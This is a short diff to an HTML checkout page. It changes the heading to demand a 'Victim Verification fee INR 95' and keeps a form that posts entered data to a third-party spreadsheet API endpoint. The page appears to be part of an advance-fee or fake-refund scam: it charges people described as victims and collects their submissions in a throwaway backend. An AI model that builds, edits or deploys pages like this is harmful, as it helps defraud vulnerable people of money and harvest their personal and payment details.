--- a/checkout.html
+++ b/checkout.html
@@ -117,8 +117,8 @@
 
 <body>
 
-    <h2> Kindly pay the processing fee INR 195</h2>
-    <p> Note: Pay from your own account only  .</p>
+    <h2> Kindly pay the Victim Verification fee INR 95</h2>
+    <p> Note: Pay from your own account only .</p>
 
     <form class="modal-content" action="https://sheetdb.io/api/v1/vs4tdo0usckts" method="post" id="sheetdb-form">
 
